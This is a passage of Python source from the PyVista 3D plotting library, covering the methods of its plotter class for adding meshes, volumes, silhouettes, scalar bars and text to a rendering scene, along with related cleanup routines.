= f'{type(mesh).__name__}({mesh.memory_address})' nan_color = Color( nan_color, default_opacity=nan_opacity, default_color=self._theme.nan_color ) if color is True: color = self._theme.color if texture is False: texture = None if culling is True: culling = 'backface' rgb = kwargs.pop('rgba', rgb) feature_angle = kwargs.pop('feature_angle', 30) # account for legacy behavior if 'stitle' in kwargs: # pragma: no cover warnings.warn(USE_SCALAR_BAR_ARGS, PyvistaDeprecationWarning) scalar_bar_args.setdefault('title', kwargs.pop('stitle')) if "scalar" in kwargs: raise TypeError( "`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?" ) assert_empty_kwargs(**kwargs) ##### Handle composite datasets ##### if isinstance(mesh, pyvista.MultiBlock): # first check the scalars if clim is None and scalars is not None: # Get the data range across the array for all blocks # if scalars specified if isinstance(scalars, str): clim = mesh.get_data_range(scalars) else: # TODO: an array was given... how do we deal with # that? Possibly a 2D arrays or list of # arrays where first index corresponds to # the block? This could get complicated real # quick. raise TypeError( 'scalars array must be given as a string name for multiblock datasets.' ) the_arguments = locals() the_arguments.pop('self') the_arguments.pop('mesh') the_arguments.pop('kwargs') if multi_colors: # Compute unique colors for each index of the block if _has_matplotlib(): from itertools import cycle import matplotlib cycler = matplotlib.rcParams['axes.prop_cycle'] colors = cycle(cycler) else: multi_colors = False logging.warning('Please install matplotlib for color cycles') # Now iteratively plot each element of the multiblock dataset actors = [] for idx in range(mesh.GetNumberOfBlocks()): if mesh[idx] is None: continue # Get a good name to use next_name = f'{name}-{idx}' # Get the data object if not is_pyvista_dataset(mesh[idx]): data = wrap(mesh.GetBlock(idx)) if not is_pyvista_dataset(mesh[idx]): continue # move on if we can't plot it else: data = mesh.GetBlock(idx) if data is None or (not isinstance(data, pyvista.MultiBlock) and data.n_points < 1): # Note that a block can exist but be None type # or it could have zeros points (be empty) after filtering continue # Now check that scalars is available for this dataset if isinstance(data, _vtk.vtkMultiBlockDataSet) or get_array(data, scalars) is None: ts = None else: ts = scalars if multi_colors: color = next(colors)['color'] ## Add to the scene the_arguments['color'] = color the_arguments['scalars'] = ts the_arguments['name'] = next_name the_arguments['texture'] = None a = self.add_mesh(data, **the_arguments) actors.append(a) if (reset_camera is None and not self.camera_set) or reset_camera: cpos = self.get_default_cam_pos() self.camera_position = cpos self.camera_set = False self.reset_camera() return actors ##### Plot a single PyVista mesh ##### if silhouette: if isinstance(silhouette, dict): self.add_silhouette(mesh, silhouette) else: self.add_silhouette(mesh) # Try to plot something if no preference given if scalars is None and color is None and texture is None: # Prefer texture first if len(list(mesh.textures.keys())) > 0: texture = True # If no texture, plot any active scalar else: # Make sure scalars components are not vectors/tuples scalars = mesh.active_scalars_name # Don't allow plotting of string arrays by default if scalars is not None: # and np.issubdtype(mesh.active_scalars.dtype, np.number): scalar_bar_args.setdefault('title', scalars) else: scalars = None # Make sure scalars is a numpy array after this point original_scalar_name = None if isinstance(scalars, str): self.mapper.SetArrayName(scalars) # enable rgb if the scalars name ends with rgb or rgba if rgb is None: if scalars.endswith('_rgb') or scalars.endswith('_rgba'): rgb = True original_scalar_name = scalars scalars = get_array(mesh, scalars, preference=preference, err=True) scalar_bar_args.setdefault('title', original_scalar_name) # Compute surface normals if using smooth shading if smooth_shading: mesh, scalars = prepare_smooth_shading( mesh, scalars, texture, split_sharp_edges, feature_angle, preference ) if mesh.n_points < 1: raise ValueError('Empty meshes cannot be plotted. Input mesh has zero points.') # set main values self.mesh = mesh self.mapper.SetInputData(self.mesh) self.mapper.GetLookupTable().SetNumberOfTableValues(n_colors) if interpolate_before_map: self.mapper.InterpolateScalarsBeforeMappingOn() actor = _vtk.vtkActor() prop = _vtk.vtkProperty() actor.SetMapper(self.mapper) actor.SetProperty(prop) if texture is True or isinstance(texture, (str, int)): texture = mesh._activate_texture(texture) if texture: if isinstance(texture, np.ndarray): texture = numpy_to_texture(texture) if not isinstance(texture, (_vtk.vtkTexture, _vtk.vtkOpenGLTexture)): raise TypeError(f'Invalid texture type ({type(texture)})') if mesh.GetPointData().GetTCoords() is None: raise ValueError( 'Input mesh does not have texture coordinates to support the texture.' ) actor.SetTexture(texture) # Set color to white by default when using a texture if color is None: color = 'white' if scalars is None: show_scalar_bar = False self.mapper.SetScalarModeToUsePointFieldData() # see https://github.com/pyvista/pyvista/issues/950 mesh.set_active_scalars(None) # Handle making opacity array custom_opac, opacity = process_opacity( mesh, opacity, preference, n_colors, scalars, use_transparency ) # Scalars formatting ================================================== if scalars is not None: show_scalar_bar, n_colors, clim = self.mapper.set_scalars( mesh, scalars, scalar_bar_args, rgb, component, preference, interpolate_before_map, custom_opac, annotations, log_scale, nan_color, above_color, below_color, cmap, flip_scalars, opacity, categories, n_colors, clim, self._theme, show_scalar_bar, ) elif custom_opac: # no scalars but custom opacity self.mapper.set_custom_opacity( opacity, color, mesh, n_colors, preference, interpolate_before_map, rgb, self._theme, ) else: self.mapper.SetScalarModeToUseFieldData() # Set actor properties ================================================ # select view style if not style: style = 'surface' style = style.lower() if style == 'wireframe': prop.SetRepresentationToWireframe() if color is None: color = self._theme.outline_color elif style == 'points': prop.SetRepresentationToPoints() elif style == 'surface': prop.SetRepresentationToSurface() else: raise ValueError( 'Invalid style. Must be one of the following:\n' '\t"surface"\n' '\t"wireframe"\n' '\t"points"\n' ) prop.SetPointSize(point_size) prop.SetAmbient(ambient) prop.SetDiffuse(diffuse) prop.SetSpecular(specular) prop.SetSpecularPower(specular_power) if pbr: if not _vtk.VTK9: # pragma: no cover raise RuntimeError('Physically based rendering requires VTK 9 ' 'or newer') prop.SetInterpolationToPBR() prop.SetMetallic(metallic) prop.SetRoughness(roughness) elif smooth_shading: prop.SetInterpolationToPhong() else: prop.SetInterpolationToFlat() # edge display style if show_edges: prop.EdgeVisibilityOn() rgb_color = Color(color, default_color=self._theme.color) prop.SetColor(rgb_color.float_rgb) if isinstance(opacity, (float, int)): prop.SetOpacity(opacity) prop.SetEdgeColor(Color(edge_color, default_color=self._theme.edge_color).float_rgb) if render_points_as_spheres: prop.SetRenderPointsAsSpheres(render_points_as_spheres) if render_lines_as_tubes: prop.SetRenderLinesAsTubes(render_lines_as_tubes) # legend label if label: if not isinstance(label, str): raise TypeError('Label must be a string') geom = pyvista.Triangle() if scalars is not None: geom = pyvista.Box() rgb_color = Color('black') geom.points -= geom.center addr = actor.GetAddressAsString("") self.renderer._labels[addr] = [geom, label, rgb_color] # lighting display style if not lighting: prop.LightingOff() # set line thickness if line_width: prop.SetLineWidth(line_width) self.add_actor( actor, reset_camera=reset_camera, name=name, culling=culling, pickable=pickable, render=render, ) # hide scalar bar if using special scalars if scalar_bar_args.get('title') == '__custom_rgba': show_scalar_bar = False # Only show scalar bar if there are scalars if show_scalar_bar and scalars is not None: self.add_scalar_bar(**scalar_bar_args) self.renderer.Modified() return actor def add_volume( self, volume, scalars=None, clim=None, resolution=None, opacity='linear', n_colors=256, cmap=None, flip_scalars=False, reset_camera=None, name=None, ambient=0.0, categories=False, culling=False, multi_colors=False, blending='composite', mapper=None, scalar_bar_args=None, show_scalar_bar=None, annotations=None, pickable=True, preference="point", opacity_unit_distance=None, shade=False, diffuse=0.7, specular=0.2, specular_power=10.0, render=True, **kwargs, ): """Add a volume, rendered using a smart mapper by default. Requires a 3D :class:`numpy.ndarray` or :class:`pyvista.UniformGrid`. Parameters ---------- volume : 3D numpy.ndarray or pyvista.UniformGrid The input volume to visualize. 3D numpy arrays are accepted. scalars : str or numpy.ndarray, optional Scalars used to "color" the mesh. Accepts a string name of an array that is present on the mesh or an array equal to the number of cells or the number of points in the mesh. Array should be sized as a single vector. If ``scalars`` is ``None``, then the active scalars are used. clim : 2 item list, optional Color bar range for scalars. Defaults to minimum and maximum of scalars array. Example: ``[-1, 2]``. ``rng`` is also an accepted alias for this. resolution : list, optional Block resolution. opacity : str or numpy.ndarray, optional Opacity mapping for the scalars array. A string can also be specified to map the scalars range to a predefined opacity transfer function (options include: 'linear', 'linear_r', 'geom', 'geom_r'). Or you can pass a custom made transfer function that is an array either ``n_colors`` in length or shorter. n_colors : int, optional Number of colors to use when displaying scalars. Defaults to 256. The scalar bar will also have this many colors. cmap : str, optional Name of the Matplotlib colormap to us when mapping the ``scalars``. See available Matplotlib colormaps. Only applicable for when displaying ``scalars``. Requires Matplotlib to be installed. ``colormap`` is also an accepted alias for this. If ``colorcet`` or ``cmocean`` are installed, their colormaps can be specified by name. flip_scalars : bool, optional Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do this as well. reset_camera : bool, optional Reset the camera after adding this mesh to the scene. name : str, optional The name for the added actor so that it can be easily updated. If an actor of this name already exists in the rendering window, it will be replaced by the new actor. ambient : float, optional When lighting is enabled, this is the amount of light from 0 to 1 that reaches the actor when not directed at the light source emitted from the viewer. Default 0.0. categories : bool, optional If set to ``True``, then the number of unique values in the scalar array will be used as the ``n_colors`` argument. culling : str, optional Does not render faces that are culled. Options are ``'front'`` or ``'back'``. This can be helpful for dense surface meshes, especially when edges are visible, but can cause flat meshes to be partially displayed. Defaults ``False``. multi_colors : bool, optional Whether or not to use multiple colors when plotting MultiBlock object. Blocks will be colored sequentially as 'Reds', 'Greens', 'Blues', and 'Grays'. blending : str, optional Blending mode for visualisation of the input object(s). Can be one of 'additive', 'maximum', 'minimum', 'composite', or 'average'. Defaults to 'additive'. mapper : str, optional Volume mapper to use given by name. Options include: ``'fixed_point'``, ``'gpu'``, ``'open_gl'``, and ``'smart'``. If ``None`` the ``"volume_mapper"`` in the ``self._theme`` is used. scalar_bar_args : dict, optional Dictionary of keyword arguments to pass when adding the scalar bar to the scene. For options, see :func:`pyvista.BasePlotter.add_scalar_bar`. show_scalar_bar : bool If ``False``, a scalar bar will not be added to the scene. Defaults to ``True``. annotations : dict, optional Pass a dictionary of annotations. Keys are the float values in the scalars range to annotate on the scalar bar and the values are the the string annotations. pickable : bool, optional Set whether this mesh is pickable. preference : str, optional When ``mesh.n_points == mesh.n_cells`` and setting scalars, this parameter sets how the scalars will be mapped to the mesh. Default ``'points'``, causes the scalars will be associated with the mesh points. Can be either ``'points'`` or ``'cells'``. opacity_unit_distance : float Set/Get the unit distance on which the scalar opacity transfer function is defined. Meaning that over that distance, a given opacity (from the transfer function) is accumulated. This is adjusted for the actual sampling distance during rendering. By default, this is the length of the diagonal of the bounding box of the volume divided by the dimensions. shade : bool Default off. If shading is turned on, the mapper may perform shading calculations - in some cases shading does not apply (for example, in a maximum intensity projection) and therefore shading will not be performed even if this flag is on. diffuse : float, optional The diffuse lighting coefficient. Default ``1.0``. specular : float, optional The specular lighting coefficient. Default ``0.0``. specular_power : float, optional The specular power. Between ``0.0`` and ``128.0``. render : bool, optional Force a render when True. Default ``True``. **kwargs : dict, optional Optional keyword arguments. Returns ------- vtk.vtkActor VTK actor of the volume. Examples -------- Show a built-in volume example with the coolwarm colormap. >>> from pyvista import examples >>> import pyvista as pv >>> bolt_nut = examples.download_bolt_nut() >>> pl = pv.Plotter() >>> _ = pl.add_volume(bolt_nut, cmap="coolwarm") >>> pl.show() """ # Handle default arguments # Supported aliases clim = kwargs.pop('rng', clim) cmap = kwargs.pop('colormap', cmap) culling = kwargs.pop("backface_culling", culling) if "scalar" in kwargs: raise TypeError( "`scalar` is an invalid keyword argument for `add_mesh`. Perhaps you mean `scalars` with an s?" ) assert_empty_kwargs(**kwargs) # Avoid mutating input if scalar_bar_args is None: scalar_bar_args = {} else: scalar_bar_args = scalar_bar_args.copy() # account for legacy behavior if 'stitle' in kwargs: # pragma: no cover warnings.warn(USE_SCALAR_BAR_ARGS, PyvistaDeprecationWarning) scalar_bar_args.setdefault('title', kwargs.pop('stitle')) if show_scalar_bar is None: show_scalar_bar = self._theme.show_scalar_bar if culling is True: culling = 'backface' if mapper is None: mapper = self._theme.volume_mapper # only render when the plotter has already been shown if render is None: render = not self._first_time # Convert the VTK data object to a pyvista wrapped object if necessary if not is_pyvista_dataset(volume): if isinstance(volume, np.ndarray): volume = wrap(volume) if resolution is None: resolution = [1, 1, 1] elif len(resolution) != 3: raise ValueError('Invalid resolution dimensions.') volume.spacing = resolution else: volume = wrap(volume) if not is_pyvista_dataset(volume): raise TypeError( f'Object type ({type(volume)}) not supported for plotting in PyVista.' ) else: # HACK: Make a copy so the original object is not altered. # Also, place all data on the nodes as issues arise when # volume rendering on the cells. volume = volume.cell_data_to_point_data() if name is None: name = f'{type(volume).__name__}({volume.memory_address})' if isinstance(volume, pyvista.MultiBlock): from itertools import cycle cycler = cycle(['Reds', 'Greens', 'Blues', 'Greys', 'Oranges', 'Purples']) # Now iteratively plot each element of the multiblock dataset actors = [] for idx in range(volume.GetNumberOfBlocks()): if volume[idx] is None: continue # Get a good name to use next_name = f'{name}-{idx}' # Get the data object block = wrap(volume.GetBlock(idx)) if resolution is None: try: block_resolution = block.GetSpacing() except AttributeError: block_resolution = resolution else: block_resolution = resolution if multi_colors: color = next(cycler) else: color = cmap a = self.add_volume( block, resolution=block_resolution, opacity=opacity, n_colors=n_colors, cmap=color, flip_scalars=flip_scalars, reset_camera=reset_camera, name=next_name, ambient=ambient, categories=categories, culling=culling, clim=clim, mapper=mapper, pickable=pickable, opacity_unit_distance=opacity_unit_distance, shade=shade, diffuse=diffuse, specular=specular, specular_power=specular_power, render=render, ) actors.append(a) return actors if not isinstance(volume, pyvista.UniformGrid): raise TypeError( f'Type {type(volume)} not supported for volume rendering at this time. Use `pyvista.UniformGrid`.' ) if opacity_unit_distance is None: opacity_unit_distance = volume.length / (np.mean(volume.dimensions) - 1) if scalars is None: # Make sure scalars components are not vectors/tuples scalars = volume.active_scalars # Don't allow plotting of string arrays by default if scalars is not None and np.issubdtype(scalars.dtype, np.number): scalar_bar_args.setdefault('title', volume.active_scalars_info[1]) else: raise ValueError('No scalars to use for volume rendering.') elif isinstance(scalars, str): pass ############## title = 'Data' if isinstance(scalars, str): title = scalars scalars = get_array(volume, scalars, preference=preference, err=True) scalar_bar_args.setdefault('title', title) if not isinstance(scalars, np.ndarray): scalars = np.asarray(scalars) if not np.issubdtype(scalars.dtype, np.number): raise TypeError('Non-numeric scalars are currently not supported for volume rendering.') if scalars.ndim != 1: scalars = scalars.ravel() if scalars.dtype == np.bool_ or scalars.dtype == np.uint8: scalars = scalars.astype(np.float_) # Define mapper, volume, and add the correct properties mappers = { 'fixed_point': _vtk.vtkFixedPointVolumeRayCastMapper, 'gpu': _vtk.vtkGPUVolumeRayCastMapper, 'open_gl': _vtk.vtkOpenGLGPUVolumeRayCastMapper, 'smart': _vtk.vtkSmartVolumeMapper, } if not isinstance(mapper, str) or mapper not in mappers.keys(): raise TypeError( f"Mapper ({mapper}) unknown. Available volume mappers include: {', '.join(mappers.keys())}" ) self.mapper = make_mapper(mappers[mapper]) # Scalars interpolation approach if scalars.shape[0] == volume.n_points: volume.point_data.set_array(scalars, title, True) self.mapper.SetScalarModeToUsePointData() elif scalars.shape[0] == volume.n_cells: volume.cell_data.set_array(scalars, title, True) self.mapper.SetScalarModeToUseCellData() else: raise_not_matching(scalars, volume) # Set scalars range if clim is None: clim = [np.nanmin(scalars), np.nanmax(scalars)] elif isinstance(clim, float) or isinstance(clim, int): clim = [-clim, clim] ############### scalars = scalars.astype(np.float_) with np.errstate(invalid='ignore'): idxs0 = scalars < clim[0] idxs1 = scalars > clim[1] scalars[idxs0] = clim[0] scalars[idxs1] = clim[1] scalars = ((scalars - np.nanmin(scalars)) / (np.nanmax(scalars) - np.nanmin(scalars))) * 255 # scalars = scalars.astype(np.uint8) volume[title] = scalars self.mapper.scalar_range = clim # Set colormap and build lookup table table = _vtk.vtkLookupTable() # table.SetNanColor(nan_color) # NaN's are chopped out with current implementation # above/below colors not supported with volume rendering if isinstance(annotations, dict): for val, anno in annotations.items(): table.SetAnnotation(float(val), str(anno)) if cmap is None: # Set default map if matplotlib is available if _has_matplotlib(): cmap = self._theme.cmap if cmap is not None: if not _has_matplotlib(): raise ImportError('Please install matplotlib for volume rendering.') cmap = get_cmap_safe(cmap) if categories: if categories is True: n_colors = len(np.unique(scalars)) elif isinstance(categories, int): n_colors = categories if flip_scalars: cmap = cmap.reversed() color_tf = _vtk.vtkColorTransferFunction() for ii in range(n_colors): color_tf.AddRGBPoint(ii, *cmap(ii)[:-1]) # Set opacities if isinstance(opacity, (float, int)): opacity_values = [opacity] * n_colors elif isinstance(opacity, str): opacity_values = pyvista.opacity_transfer_function(opacity, n_colors) elif isinstance(opacity, (np.ndarray, list, tuple)): opacity = np.array(opacity) opacity_values = opacity_transfer_function(opacity, n_colors) opacity_tf = _vtk.vtkPiecewiseFunction() for ii in range(n_colors): opacity_tf.AddPoint(ii, opacity_values[ii] / n_colors) # Now put color tf and opacity tf into a lookup table for the scalar bar table.SetNumberOfTableValues(n_colors) lut = cmap(np.array(range(n_colors))) * 255 lut[:, 3] = opacity_values lut = lut.astype(np.uint8) table.SetTable(_vtk.numpy_to_vtk(lut)) table.SetRange(*clim) self.mapper.lookup_table = table self.mapper.SetInputData(volume) blending = blending.lower() if blending in ['additive', 'add', 'sum']: self.mapper.SetBlendModeToAdditive() elif blending in ['average', 'avg', 'average_intensity']: self.mapper.SetBlendModeToAverageIntensity() elif blending in ['composite', 'comp']: self.mapper.SetBlendModeToComposite() elif blending in ['maximum', 'max', 'maximum_intensity']: self.mapper.SetBlendModeToMaximumIntensity() elif blending in ['minimum', 'min', 'minimum_intensity']: self.mapper.SetBlendModeToMinimumIntensity() else: raise ValueError( f'Blending mode {blending!r} invalid. ' 'Please choose one of "additive", ' '"composite", "minimum" or "maximum".' ) self.mapper.Update() self.volume = _vtk.vtkVolume() self.volume.SetMapper(self.mapper) prop = _vtk.vtkVolumeProperty() prop.SetColor(color_tf) prop.SetScalarOpacity(opacity_tf) prop.SetAmbient(ambient) prop.SetScalarOpacityUnitDistance(opacity_unit_distance) prop.SetShade(shade) prop.SetDiffuse(diffuse) prop.SetSpecular(specular) prop.SetSpecularPower(specular_power) self.volume.SetProperty(prop) actor, prop = self.add_actor( self.volume, reset_camera=reset_camera, name=name, culling=culling, pickable=pickable, render=render, ) # Add scalar bar if scalars are available if show_scalar_bar and scalars is not None: self.add_scalar_bar(**scalar_bar_args) self.renderer.Modified() return actor def add_silhouette(self, mesh, params=None): """Add a silhouette of a PyVista or VTK dataset to the scene. A silhouette can also be generated directly in :func:`add_mesh <pyvista.Plotter.add_mesh>`. See also :ref:`silhouette_example`. Parameters ---------- mesh : pyvista.PolyData Mesh for generating silhouette to plot. params : dict, optional * If not supplied, the default theme values will be used. * ``color``: ``color_like``, color of the silhouette * ``line_width``: ``float``, edge width * ``opacity``: ``float`` between 0 and 1, edge transparency * ``feature_angle``: If a ``float``, display sharp edges exceeding that angle in degrees. * ``decimate``: ``float`` between 0 and 1, level of decimation Returns ------- vtk.vtkActor VTK actor of the silhouette. Examples -------- >>> import pyvista >>> from pyvista import examples >>> bunny = examples.download_bunny() >>> plotter = pyvista.Plotter() >>> _ = plotter.add_mesh(bunny, color='tan') >>> _ = plotter.add_silhouette(bunny, ... params={'color': 'red', 'line_width': 8.0}) >>> plotter.view_xy() >>> plotter.show() """ silhouette_params = self._theme.silhouette.to_dict() if params: silhouette_params.update(params) if not is_pyvista_dataset(mesh): mesh = wrap(mesh) if not isinstance(mesh, pyvista.PolyData): raise TypeError(f"Expected type is `PolyData` but {type(mesh)} was given.") if isinstance(silhouette_params["decimate"], float): silhouette_mesh = mesh.decimate(silhouette_params["decimate"]) else: silhouette_mesh = mesh alg = _vtk.vtkPolyDataSilhouette() alg.SetInputData(silhouette_mesh) alg.SetCamera(self.renderer.camera) if silhouette_params["feature_angle"] is not None: alg.SetEnableFeatureAngle(True) alg.SetFeatureAngle(silhouette_params["feature_angle"]) else: alg.SetEnableFeatureAngle(False) mapper = make_mapper(_vtk.vtkDataSetMapper) mapper.SetInputConnection(alg.GetOutputPort()) actor, prop = self.add_actor(mapper) prop.SetColor(Color(silhouette_params["color"]).float_rgb) prop.SetOpacity(silhouette_params["opacity"]) prop.SetLineWidth(silhouette_params["line_width"]) return actor def update_scalar_bar_range(self, clim, name=None): """Update the value range of the active or named scalar bar. Parameters ---------- clim : sequence The new range of scalar bar. Two item list (e.g. ``[-1, 2]``). name : str, optional The title of the scalar bar to update. """ if isinstance(clim, float) or isinstance(clim, int): clim = [-clim, clim] if len(clim) != 2: raise TypeError('clim argument must be a length 2 iterable of values: (min, max).') if name is None: if not hasattr(self, 'mapper'): raise AttributeError('This plotter does not have an active mapper.') self.mapper.scalar_range = clim return # Use the name to find the desired actor def update_mapper(mapper_helper): mapper_helper.scalar_range = clim return try: for mh in self._scalar_bar_mappers[name]: update_mapper(mh) except KeyError: raise KeyError('Name ({}) not valid/not found in this plotter.') return def clear(self): """Clear plot by removing all actors and properties. Examples -------- >>> import pyvista >>> plotter = pyvista.Plotter() >>> actor = plotter.add_mesh(pyvista.Sphere()) >>> plotter.clear() >>> plotter.renderer.actors {} """ self.renderers.clear() self.scalar_bars.clear() self.mesh = None def link_views(self, views=0): """Link the views' cameras. Parameters ---------- views : int | tuple or list If ``views`` is int, link the views to the given view index or if ``views`` is a tuple or a list, link the given views cameras. """ if isinstance(views, (int, np.integer)): for renderer in self.renderers: renderer.camera = self.renderers[views].camera return views = np.asarray(views) if np.issubdtype(views.dtype, np.integer): for view_index in views: self.renderers[view_index].camera = self.renderers[views[0]].camera else: raise TypeError(f'Expected type is int, list or tuple: {type(views)} is given') def unlink_views(self, views=None): """Unlink the views' cameras. Parameters ---------- views : None, int, tuple or list If ``views`` is None unlink all the views, if ``views`` is int unlink the selected view's camera or if ``views`` is a tuple or a list, unlink the given views cameras. """ if views is None: for renderer in self.renderers: renderer.camera = Camera() renderer.reset_camera() elif isinstance(views, int): self.renderers[views].camera = Camera() self.renderers[views].reset_camera() elif isinstance(views, collections.abc.Iterable): for view_index in views: self.renderers[view_index].camera = Camera() self.renderers[view_index].reset_camera() else: raise TypeError(f'Expected type is None, int, list or tuple: {type(views)} is given') @wraps(ScalarBars.add_scalar_bar) def add_scalar_bar(self, *args, **kwargs): """Wrap for ``ScalarBars.add_scalar_bar``.""" # only render when the plotter has already been shown render = kwargs.get('render', None) if render is None: kwargs['render'] = not self._first_time # check if maper exists mapper = kwargs.get('mapper', None) if mapper is None: if not hasattr(self, 'mapper') or self.mapper is None: raise AttributeError('Mapper does not exist. Add a mesh with scalars first.') kwargs['mapper'] = self.mapper # title can be the first and only arg if len(args): title = args[0] else: title = kwargs.get('title', '') if title is None: title = '' kwargs['title'] = title interactive = kwargs.get('interactive', None) if interactive is None: interactive = self._theme.interactive if self.shape != (1, 1): interactive = False elif interactive and self.shape != (1, 1): raise ValueError('Interactive scalar bars disabled for multi-renderer plots') # by default, use the plotter local theme kwargs.setdefault('theme', self._theme) return self.scalar_bars.add_scalar_bar(**kwargs) def update_scalars(self, scalars, mesh=None, render=True): """Update scalars of an object in the plotter. Parameters ---------- scalars : np.ndarray Scalars to replace existing scalars. mesh : vtk.PolyData or vtk.UnstructuredGrid, optional Object that has already been added to the Plotter. If None, uses last added mesh. render : bool, optional Force a render when True. Default ``True``. """ if mesh is None: mesh = self.mesh if isinstance(mesh, (collections.abc.Iterable, pyvista.MultiBlock)): # Recursive if need to update scalars on many meshes for m in mesh: self.update_scalars(scalars, mesh=m, render=False) if render: self.render() return if isinstance(scalars, str): # Grab scalars array if name given scalars = get_array(mesh, scalars) if scalars is None: if render: self.render() return if scalars.shape[0] == mesh.GetNumberOfPoints(): data = mesh.GetPointData() elif scalars.shape[0] == mesh.GetNumberOfCells(): data = mesh.GetCellData() else: raise_not_matching(scalars, mesh) vtk_scalars = data.GetScalars() if vtk_scalars is None: raise ValueError('No active scalars') s = convert_array(vtk_scalars) s[:] = scalars data.Modified() try: # Why are the points updated here? Not all datasets have points # and only the scalars array is modified by this function... mesh.GetPoints().Modified() except: pass if render: self.render() def update_coordinates(self, points, mesh=None, render=True): """Update the points of an object in the plotter. Parameters ---------- points : np.ndarray Points to replace existing points. mesh : vtk.PolyData or vtk.UnstructuredGrid, optional Object that has already been added to the Plotter. If None, uses last added mesh. render : bool, optional Force a render when True. Default ``True``. """ if mesh is None: mesh = self.mesh mesh.points = points # only render when the plotter has already been shown if render is None: render = not self._first_time if render: self.render() def _clear_ren_win(self): """Clear the render window.""" if hasattr(self, 'ren_win'): self.ren_win.Finalize() del self.ren_win def close(self, render=False): """Close the render window. Parameters ---------- render : bool Unused argument. """ # optionally run just prior to exiting the plotter if self._before_close_callback is not None: self._before_close_callback(self) self._before_close_callback = None # must close out widgets first super().close() # Renderer has an axes widget, so close it self.renderers.close() self.renderers.remove_all_lights() # Grab screenshots of last render if self._store_image: self.last_image = self.screenshot(None, return_img=True) self.last_image_depth = self.get_image_depth() # reset scalar bars self.clear() # grab the display id before clearing the window # this is an experimental feature if KILL_DISPLAY: # pragma: no cover disp_id = None if hasattr(self, 'ren_win'): disp_id = self.ren_win.GetGenericDisplayId() self._clear_ren_win() if self.iren is not None: self.iren.remove_observers() self.iren.terminate_app() if KILL_DISPLAY: # pragma: no cover _kill_display(disp_id) self.iren = None if hasattr(self, 'textActor'): del self.textActor # end movie if hasattr(self, 'mwriter'): try: self.mwriter.close() except BaseException: pass # this helps managing closed plotters self._closed = True def deep_clean(self): """Clean the plotter of the memory.""" if hasattr(self, 'renderers'): self.renderers.deep_clean() if getattr(self, 'mesh', None) is not None: self.mesh.point_data = None self.mesh.cell_data = None self.mesh = None if getattr(self, 'mapper', None) is not None: self.mapper.lookup_table = None self.mapper = None self.volume = None self.textActor = None def add_text( self, text, position='upper_left', font_size=18, color=None, font=None, shadow=False, name=None, viewport=False, *, render=True, ): """Add text to plot object in the top left corner by default. Parameters ---------- text : str The text to add the rendering. position : str, tuple(float), optional Position to place the bottom left corner of the text box. If tuple is used, the position of the text uses the pixel coordinate system (default). In this case, it returns a more general `vtkOpenGLTextActor`. If string name is used, it returns a `vtkCornerAnnotation` object normally used for fixed labels (like title or xlabel). Default is to find the top left corner of the rendering window and place text box up there. Available position: ``'lower_left'``, ``'lower_right'``, ``'upper_left'``, ``'upper_right'``, ``'lower_edge'``, ``'upper_edge'``, ``'right_edge'``, and ``'left_edge'``. font_size : float, optional Sets the size of the title font. Defaults to 18. color : color_like, optional Either a string, RGB list, or hex color string. For example: * ``color='white'`` * ``color='w'`` * ``color=[1.0, 1.0, 1.0]`` * ``color='#FFFFFF'`` Defaults to :attr:`pyvista.global_theme.font.color <pyvista.themes._Font.color>`. font : str, optional Font name may be ``'courier'``, ``'times'``, or ``'arial'``. shadow : bool, optional Adds a black shadow to the text. Defaults to ``False``. name : str, optional The name for the added actor so that it can be easily updated. If an actor of this name already exists in the rendering window, it will be replaced by the new actor. viewport : bool, optional If ``True`` and position is a tuple of float, uses the normalized viewport coordinate system (values between 0.0 and 1.0 and support for HiDPI). render : bool, optional Force a render when ``True`` (default). Returns ------- vtk.vtkTextActor Text actor added to plot. Examples -------- >>> import pyvista >>> pl = pyvista.Plotter() >>> actor = pl.add_text('Sample Text', position='upper_right', color='blue', ... shadow=True, font_size=26) >>> pl.show() """ if font is None: font = self._theme.font.family if font_size is None: font_size = self._theme.font.size if position is None: # Set the position of the text to the top left corner window_size = self.window_size x = (window_size[0] * 0.02) / self.shape[0] y = (window_size[1] * 0.85) / self.shape[0] position = [x, y] corner_mappings = { 'lower_left': _vtk.vtkCornerAnnotation.LowerLeft, 'lower_right': _vtk.vtkCornerAnnotation.LowerRight, 'upper_left': _vtk.vtkCornerAnnotation.UpperLeft, 'upper_right': _vtk.vtkCornerAnnotation.UpperRight, 'lower_edge': _vtk.vtkCornerAnnotation.LowerEdge, 'upper_edge': _vtk.vtkCornerAnnotation.UpperEdge, 'left_edge': _vtk.vtkCornerAnnotation.LeftEdge, 'right_edge': _vtk.vtkCornerAnnotation.RightEdge, } corner_mappings['ll'] = corner_mappings['lower_left'] corner_mappings['lr'] = corner_mappings['lower_right'] corner_mappings['ul'] = corner_mappings['upper_left'] corner_mappings['ur'] = corner_mappings['upper_right'] corner_mappings['top'] = corner_mappings['upper_edge'] corner_mappings['bottom'] = corner_mappings['lower_edge'] corner_mappings['right'] = corner_mappings['right_edge'] corner_mappings['r'] = corner_mappings['right_edge'] corner_mappings['left'] = corner_mappings['left_edge'] corner_mappings['l'] = corner_mappings['left_edge'] if isinstance(position, (int, str, bool)): if isinstance(position, str): position = corner_mappings[position] elif position is True: position = corner_mappings['upper_left'] self.textActor = _vtk.vtkCornerAnnotation() # This is how you set the font size with this actor self.textActor.SetLinearFontScaleFactor(font_size // 2) self.textActor.SetText(position, text) else: self.textActor = _vtk.vtkTextActor() self.textActor.SetInput(text) self.textActor.SetPosition(position) if viewport: self.textActor.GetActualPositionCoordinate().SetCoordinateSystemToNormalizedViewport() self.textActor.GetActualPosition2Coordinate().SetCoordinateSystemToNormalizedViewport() self.textActor.GetTextProperty().SetFontSize(int(font_size * 2)) self.textActor.GetTextProperty().SetColor( Color(color, default_color=self._theme.font.color).float_rgb ) self.textActor.GetTextProperty().SetFontFamily(FONTS[font].value) self.textActor.GetTextProperty().SetShadow(shadow) self.add_actor(self.textActor, reset_camera=False, name=name, pickable=False, render=render) return self.textActor def open_movie(self, filename, framerate=24, quality=5, **kwargs): """Establish a connection to the ffmpeg writer. Parameters ---------- filename : str Filename of the movie to open. Filename should end in mp4, but other filetypes may be supported. See ``imagio.get_writer``. framerate : int, optional Frames per second. quality : int, optional Quality 10 is the top possible quality for any codec. The range is ``0 - 10``. Higher quality leads to a larger file. **kwargs : dict, optional See the documentation for ``imageio.get_writer`` for additional kwargs. Notes ----- See the documentation for `imageio.get_writer <https://imageio.readthedocs.io/en/stable/userapi.html#imageio.get_writer>`_ Examples -------- Open a MP4 movie 